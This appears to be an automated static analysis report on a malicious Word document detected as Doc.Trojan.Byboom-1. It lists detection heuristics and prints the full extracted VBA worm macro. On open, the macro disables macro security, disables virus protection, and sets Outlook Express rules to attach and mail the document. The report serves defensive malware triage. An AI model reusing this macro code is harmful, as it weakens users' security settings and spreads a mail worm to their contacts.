Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d873f6f58d2dc444…

MALICIOUS

Office (OLE)

38.5 KB Created: 2002-08-09 17:13:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 4f1b11f5cdfdb0cc67a201473ad81405 SHA-1: f312f0726dfa210ff745404d9612e76f9913f16a SHA-256: d873f6f58d2dc444bc51bffab577707605a1b88cadadd1de8ee3d1920288f7a8
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Word document that uses an AutoOpen VBA macro to execute. The macro attempts to lower macro security settings by writing to registry keys such as HKCU\Software\Microsoft\Office\10.0\Word\Security\Level. It also contains references to WScript.Shell and CreateObject, indicating it likely attempts to download and execute additional payloads or perform other malicious actions. The document body lures the user into enabling macros by pretending to offer security advice.

Heuristics 11

  • ClamAV: Doc.Trojan.Byboom-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Byboom-1
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WSHShell = CreateObject("WScript.Shell")
WSHShell.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WSHShell = CreateObject("WScript.Shell")
WSHShell.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Written by BOOM!"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.eset.com/ In document text (OLE body)
    • http://www.symantec.com/In document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4001 bytes
SHA-256: 64f2ebdaa4b142069e244cddfa07fd42071e25b0b03ae1b1d029697fcb41ef4e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Written by BOOM!"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
'
'
' Written by BOOM!, HI ESET your NOD32 Anti-Virus is really GOOD, HI Grisoft IHate your AVG
'



Set WSHShell = CreateObject("WScript.Shell")
WSHShell.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Software\Microsoft\Office\7.0\Word\Security\Level", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Software\Microsoft\Office\8.0\Word\Security\Level", 1, "REG_DWORD"



WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\Order", "000"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Name", "Default"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Enabled", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Version", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Actions\Order", "000"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Actions\000\Value", "C:\Security2002.doc"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Actions\000\Flags", 0, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Actions\000\Type", 5, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Actions\000\ValueType", 30, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Criteria\Order", "000"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Criteria\000\Flags", 0, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Criteria\000\Logic", 0, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Rules\Mail\000\Criteria\000\Type", 20, "REG_DWORD"


WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Mail\Check mail on Startup", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Mail\Send Mail Immediately", 1, "REG_DWORD"
WSHShell.RegWrite "HKCU\Identities\" + WSHShell.RegRead("HKCU\Identities\Last User ID") + "\Software\Microsoft\Outlook Express\5.0\Hangup After Spool", 0, "REG_DWORD"


WSHShell.RegWrite "HKLM\Software\Microsoft\Security2002", "worm made by BOOM"

  
ActiveDocument.SaveAs ("C:\Security2002.doc")
Options.VirusProtection = False




End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1090315394/Ole10Native 574 bytes
SHA-256: aab0973fd55cc4fc05750a6f1dcf831a8121a46d11dd64c5b6d756dd4334f755
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.CreateObject("WScript.Shell");

Open this report in the interactive analyzer, or submit your own file for analysis.